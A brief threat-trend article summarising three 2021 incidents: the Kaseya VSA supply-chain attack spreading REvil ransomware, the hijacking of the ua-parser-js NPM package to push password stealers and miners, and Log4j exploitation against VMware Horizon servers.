Ransomware Trends 3

Adversaries exploited vulnerabilities in Kaseya VSA IT Management software in July 2021 as part of a campaign to spread the ransomware Sodinokibi, commonly known as REvil. VSA is widely used by managed service providers (MSPs) to remotely manage IT systems. The attackers leveraged zero-day vulnerabilities to obtain remote control of the MSPs’ VSA installations, which they then used to infect the endpoints of the MSPs’ customers with ransomware. This compromise impacted around 50 direct Kaseya VSA clients, as well as between 800 and 1,500 additional organisations, according to Kaseya. It also drew the attention of the US government, which ultimately indicted the accused perpetrators of the attack.

NPM is a node.js project repository that includes libraries that developers may download and use in their software. In October 2021, hackers gained access to an open-source JavaScript library with over 7 million weekly downloads and exploited it to spread password stealers and cryptocurrency miners. The NPM registry did not require multifactor authentication (MFA) for author accounts at the time, which resulted in an unknown adversary hijacking the registry accounts of many package authors. Following the takeover, the adversary disseminated malware-infected copies of legitimate packages. Package creators and end users of programmes that rely on such packages were among the victims. Google, Amazon, Facebook, IBM, and Microsoft all utilise the ‘ua-parser-js’ package, which was downloaded roughly 8 million times each week at the time.

In December 2021, a remote code execution vulnerability was discovered in Log4j, a major Java logging framework used by many third-party applications. Coinminers and botnets were the main dangers at first, but because of Log4j’s large incursion surface, the community was concerned that exploitation would spread. A remote code execution vulnerability was discovered in the Log4j library in specific cases. Though it took opponents a few weeks to get up to speed, multiple operators targeted internet-facing VMware Horizon servers using vulnerable versions of Log4j in late December 2021 and early 2022, despite it taking opponents a few weeks to catch up. Because VMware Horizon is extensively used and frequently exposed to the internet, adversaries were likely drawn to it. It is expected internet-facing apps utilizing vulnerable versions of Log4j to be targeted for months to come.